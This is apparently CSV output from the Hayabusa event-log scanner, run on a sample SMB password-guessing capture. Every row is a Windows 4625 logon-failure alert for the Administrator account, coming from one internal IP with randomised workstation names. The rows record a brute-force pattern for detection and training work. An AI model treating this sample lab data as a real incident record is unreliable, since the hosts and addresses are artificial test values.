2016-09-20 01:50:30.852 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: pay98C2Gr1di7qQd  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:30.881 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 8TyPDYm9QCAmqj7h  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:30.927 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 1Dw3iK7DQMVXy8LW  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:30.977 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: BMuO0QEkxpKRv4Vl  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:31.016 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: RaHECaQDXCXQc9Xw  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:31.060 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ewXT2VcARiaNLIxJ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:31.110 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: dGSTrm4AOojs7So0  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:31.148 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: wVTBSk0Q65LkaTqg  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:31.209 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: NjFN51w3T4VwuWa5  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:31.248 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: KG7a88h48ZEyOuYw  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:31.292 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 6ksKuTSGukc5em3B  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:31.336 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: tPEMcGV6ZR92sWNY  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:31.369 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: iBQ6sKrRjb7BsySN  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:31.421 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: gDFnG1gv7jOeIQ0t  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:31.454 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: QdFKkcNpkfAScnkp  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:31.511 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: IAYbV4ioewwkZSmy  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:31.557 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 1bQ2Dxd6nlgSXJpo  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:31.596 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: havLyoVCfdCqzrqO  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:31.648 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: b2vZLhz19pXrq9iE  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:31.688 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: A4TSN93DrSWb1ah4  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:31.718 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: QwFyrxiceLRTD9rI  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:31.762 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ARbqo84Mr5T3ltRg  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:31.901 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 34HpQJO17IDWber9  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:31.978 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: bSSbqOtdSeH58oIp  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:32.009 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: EMvTo7fU6J468WE9  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:32.051 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 8gzx6Vr9LoInM1df  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:32.096 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: kwXC2S4HwdwNE6SX  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:32.136 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 1pQa1WxSt3bj9LEv  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:32.185 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: fm65jq9tRQznmWPh  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:32.237 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: zd8BJbXvEoaDADLc  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:32.280 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: P0JlFw7S6jFUt4Iy  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:32.313 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: rfMbFXQcP5sA2wmf  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:32.349 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Xu4pgyCcDjl9h0Et  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:32.396 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: B00w8dZG3sT2Lsqo  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:32.450 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 8aKGq6qrchp4SLvT  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:32.568 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: XnScYHBCKOSHItsi  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:32.610 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: r8UMBM326M7a4njd  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:32.648 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: kTdYWOi6p7etRfya  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:32.691 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: JWSlcEVzj5lGtVg0  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:32.728 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Xc77wukLTPOYAzj2  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:32.769 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: w4WmTwTGuwDN6YXn  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:32.817 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: aeN4cSffFA04oOje  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:32.849 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: eYFPV1kGALqX8jyO  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:32.884 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: qIlhxT4qqo5bCsU3  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:32.928 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: btoOskH0112h7MTO  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:32.972 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: nWUhQJBcS7XbMJUq  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:33.004 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: E70qmXDDWqmWJjyU  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:33.047 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: oX0L8wf6nt2grLvn  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:33.081 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 0D8BwniiXsjfkYqE  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:33.124 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: sSWYo4mphuvKHQHl  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:33.164 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: im8an1mDle9f8skd  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:33.200 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: aOyLWd5CAAjnJt3C  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:33.240 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: s7gI55uWlshCLw3y  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:33.288 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: l7UogJ8bBw6Epbht  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:33.328 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: qIl0QRFHXCVAHWdV  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:33.370 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: OxPv9v4TxFvS9JMy  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:33.417 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: uHMGfCorrLXpDyeD  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:33.452 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: KQTKgFibIa8NWExO  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:33.492 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: rEnx3upH3Om0wHn7  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:33.532 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: KlNbW1ljPSTdgUKY  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:33.582 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: w2WMd3HugfjSwJPJ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:33.628 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: yEy0C6dMhysbNDrX  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:33.666 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: vxlayd8pnAZ3dZ2Q  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:33.701 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: PhKO1jyWqVEdC9w2  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:33.736 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: dAH2mHJ4ZK5GS2p0  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:33.776 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: lV2ZIWGGwlkyEMRB  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:33.811 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: sum2yMFio9KLwZk5  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:33.848 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: fICXSRvv9Vm0uVpY  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:33.894 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: IgrOk6Fjp0QtfJ3i  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:33.936 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: OPKoHLtxNoiG65sl  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:33.972 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: NctXRH1DR3slfVxQ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:34.012 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: vLnAs36K1mTivu2w  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:34.056 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: H7crZQ0eQ5RDNIp7  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
